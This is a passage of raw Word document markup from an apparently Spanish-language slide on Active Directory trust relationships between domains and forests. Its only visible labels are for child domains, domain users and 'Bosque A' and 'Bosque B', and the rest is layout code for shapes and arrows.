              <v:shape w14:anchorId="468BD011" id="Textbox 257" o:spid="_x0000_s1139" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:621.1pt;margin-top:14.05pt;width:296.8pt;height:94.6pt;z-index:1578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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1C4067DE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="63"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="6DDD758E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="2484" w:right="374" w:hanging="2110"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>Confianza entre dominios primarios y secundarios</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Niño</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2788FD6F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="387" w:lineRule="exact"/>
        <w:ind w:left="1115" w:right="14281"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6F50B5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4278113C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133A10B4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359F7E11" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B42040" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13461B6F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03971F2F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579407D8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FDC507" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767C9C65" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2588BC63" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09AFF8CF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE8E4AE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0799CBFE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="109"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32338E84" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="2485" w:right="15880" w:hanging="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Usuario de dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF1D1D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="206"/>
        <w:ind w:right="1463"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363CE675" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId111"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5961F955"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70368" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06F4540C" wp14:editId="66491644">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1520952</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>-1</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9150350" cy="685800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0350" cy="6858000"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9150350" cy="6858000"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="259" name="Image 259"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId112" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="9150096" cy="6858000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="260" name="Graphic 260"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1450975" y="2782063"/>
                            <a:ext cx="6231890" cy="2456815"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="6231890" h="2456815">
                                <a:moveTo>
                                  <a:pt x="5856224" y="1011174"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5985891" y="1050036"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5943854" y="1072642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6189345" y="1528318"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6231508" y="1505712"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6192647" y="1635252"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6062980" y="1596389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6105017" y="1573783"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5859526" y="1118108"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5817362" y="1140714"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5856224" y="1011174"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="6231890" h="2456815">
                                <a:moveTo>
                                  <a:pt x="1550035" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1578228" y="132334"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1538097" y="106299"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1256538" y="540638"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1296670" y="566674"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1164336" y="594867"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1136142" y="462534"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1176274" y="488568"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1457833" y="54228"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1417701" y="28193"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1550035" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="6231890" h="2456815">
                                <a:moveTo>
                                  <a:pt x="465455" y="1813052"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="492125" y="1954402"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="450088" y="1925701"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="125984" y="2401189"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="168021" y="2429891"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="26670" y="2456561"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2315337"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42037" y="2343912"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="366140" y="1868424"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="324103" y="1839849"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="465455" y="1813052"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="12700">
                            <a:solidFill>
                              <a:srgbClr val="FF0000"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="261" name="Graphic 261"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1564386" y="3407919"/>
                            <a:ext cx="5911850" cy="1894205"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="5911850" h="1894205">
                                <a:moveTo>
                                  <a:pt x="5910961" y="1139698"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5830697" y="1111504"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5834646" y="1142949"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1881124"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1524" y="1893697"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5836234" y="1155522"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5840222" y="1187069"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5908484" y="1141349"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5910961" y="1139698"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="5911850" h="1894205">
                                <a:moveTo>
                                  <a:pt x="5911723" y="1054862"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5902579" y="1047496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5845429" y="1001395"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5838634" y="1032459"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1239354" y="31026"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1239939" y="28321"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1246124" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1163574" y="21082"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1229868" y="74549"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1236637" y="43472"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5835942" y="1044803"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5829173" y="1075817"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5911723" y="1054862"/>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262" name="Image 262"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId113" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="3150235" y="440310"/>
                            <a:ext cx="2772283" cy="338074"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="59634D8E" id="Group 258" o:spid="_x0000_s1026" style="position:absolute;margin-left:119.75pt;margin-top:0;width:720.5pt;height:540pt;z-index:-17946112;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="91503,68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">
                <v:shape id="Image 259" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:9150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">
                  <v:imagedata r:id="rId114" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 260" o:spid="_x0000_s1028" style="position:absolute;left:14509;top:27820;width:62319;height:24568;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6231890,245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" path="m5856224,1011174r129667,38862l5943854,1072642r245491,455676l6231508,1505712r-38861,129540l6062980,1596389r42037,-22606l5859526,1118108r-42164,22606l5856224,1011174xem1550035,r28193,132334l1538097,106299,1256538,540638r40132,26036l1164336,594867,1136142,462534r40132,26034l1457833,54228,1417701,28193,1550035,xem465455,1813052r26670,141350l450088,1925701,125984,2401189r42037,28702l26670,2456561,,2315337r42037,28575l366140,1868424r-42037,-28575l465455,1813052xe" filled="f" strokecolor="red" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 261" o:spid="_x0000_s1029" style="position:absolute;left:15643;top:34079;width:59119;height:18942;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5911850,189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" path="m5910961,1139698r-80264,-28194l5834646,1142949,,1881124r1524,12573l5836234,1155522r3988,31547l5908484,1141349r2477,-1651xem5911723,1054862r-9144,-7366l5845429,1001395r-6795,31064l1239354,31026r585,-2705l1246124,r-82550,21082l1229868,74549r6769,-31077l5835942,1044803r-6769,31014l5911723,1054862xe" fillcolor="#4471c4" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Image 262" o:spid="_x0000_s1030" type="#_x0000_t75" style="position:absolute;left:31502;top:4403;width:27723;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">
                  <v:imagedata r:id="rId115" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA72220" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD4DCDA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2945A6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1361E2D3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D47733F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291D1360" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B7D1B65" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="110"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6990E381" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="5536"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CE81A9A" wp14:editId="0F514F01">
                <wp:extent cx="1370330" cy="307975"/>
                <wp:effectExtent l="9525" t="0" r="1269" b="6350"/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="175FC21B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="57"/>
                              <w:ind w:left="600"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Bosque A</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1CE81A9A" id="Textbox 263" o:spid="_x0000_s1140" type="#_x0000_t202" style="width:107.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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="175FC21B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="57"/>
                        <w:ind w:left="600"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Bosque A</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7674C8B1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79441FAA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="148"/>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40576" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D5090A9" wp14:editId="56CA7F2E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7626095</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>270801</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1370330" cy="307975"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="37831099" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="59"/>
                              <w:ind w:left="607"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Bosque B</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
